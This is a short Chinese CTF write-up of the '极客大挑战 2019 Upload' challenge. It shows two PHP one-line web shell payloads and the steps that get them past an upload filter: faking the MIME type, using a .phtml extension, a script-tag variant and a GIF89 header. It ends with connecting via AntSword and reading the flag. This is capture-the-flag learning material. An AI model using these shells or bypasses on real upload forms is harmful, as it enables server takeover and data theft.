进入后发现需要上传图片
先上传个一句话木马试试能不能上传
<?php @eval($_POST['pass']);?>
发现提交后,出现不是图片的错误
老规矩,抓包修改类型为图片类型看看能不能绕过
说是不能是php,估计是看了后缀名,将文件的后缀修改成.phtml试试
估计php的一句话木马不行了,到这里脑子就烧了,开始网上冲浪
参考:[极客大挑战 2019]Upload 1_极客大挑战2019upload1_坤舆小菜鸡的博客-CSDN博客一句话木马绕过-CSDN博客
修改一下一句话木马
<script language='php'>eval($_POST['pass']);</script>
上传后,发现还有错误
估计是有内容的检测,大佬说在文件头中加入GIF89,尝试绕过图片检测
发现终于上传成功
但是不知道上传到了哪里
大佬说一般默认就是upload目录,有些可以在源代码中看到上传地址
源码发现没有线索,进入/upload/1.phtml
发现了GIF89,即自己的上传文件,可以用蚁剑连一下
注意:连接密码是你上传的一句话密码里包含的,如果不是按照我的一句话代码的话,需要自行更改连接密码
好了,成功连接到网站了
flag还是在根目录下
获得flag
flag{667c4bb4-ec49-4eb2-8976-f44203286159}